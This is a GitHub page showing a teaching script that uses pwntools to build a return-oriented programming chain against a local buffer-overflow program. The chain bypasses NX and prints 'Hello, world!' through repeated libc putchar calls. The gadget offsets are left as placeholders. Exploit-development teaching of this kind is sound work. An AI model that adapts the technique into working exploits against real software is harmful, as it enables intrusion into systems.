This repository was archived by the owner on Aug 1, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 109
Expand file tree
/
Copy pathROP_hello.py
More file actions
78 lines (57 loc) · 2.47 KB
/
ROP_hello.py
File metadata and controls
78 lines (57 loc) · 2.47 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# Example implementation to produce ROP chain for vulnerable program,
# and print 'Hello, world!'
# Program is taking input as argument, as has buffer overflow vulneralibity
# We are using CTP framework 'pwntools' https://github.com/Gallopsled/pwntools
# We are expecting, that ASLR is disabled. Bypassing NX bit
from pwn import log, context
from pwnlib.tubes.process import process
from pwnlib.util.packing import p32, pack
from pwnlib.exception import PwnlibException
context(arch='i386', os='linux')
# NOTE this might vary based on machine
libc_entry = 0x00000000
# NOTE that you might have different offsets, depending on libc version
# and compiler settings
offset_ppr = 0x00000000 # pop/pop/ret gadget
offset_pr = 0x00000000 # pop ebx;ret
offset_exit = 0x00000000
offset_putchar = 0x00000000
# 0xf7e6740f
def main():
# payload = ""
padChar2 = b"\x90"
padSize = 32
# Initial payload
hello = "\nHello, world!\n\n" # We are using putchar function from libc
# as example to chain multiple function calls/gadgets
# For each character in our phrase, there is putchar call
payload = padChar2 * padSize
for char in hello: # Generate payload for printing 'Hello, world!'
# payload += p32(libc_entry + offset_putchar) # function p32 changes
payload += p32(libc_entry + offset_putchar)
# memoryaddress to correct format (reversed and opcoded)
# whattodo after = pop/ret gadget
payload += p32(libc_entry + offset_pr)
# pwntools function pack, is packing our input to 32-bit memory
# address with correct syntax. Ord is changing character to ASCII code
payload += pack(ord(char), 32, 'little', # function arguments
False).replace(b"\x00", b"\xff")
# Replacing nulls with '\xff', which are generated in by packing to
# fullfil 32-bit size
payload += p32(libc_entry + offset_pr)
payload += p32(0xffffffff) # Some address, we do not care, we are exiting
# so value does not matter.
payload += p32(libc_entry + offset_exit)
# Writing payload to txt file just in case,
# if we want to run program without script
f = open("payload.txt", "w+")
f.write(str(payload))
f.close
# C program is using payload as args
try:
p = process(["../vuln_progs/Overflow", payload])
log.info(p.recvall(timeout=0.5))
except PwnlibException:
print("Nulls in arguments.")
if __name__ == "__main__":
main()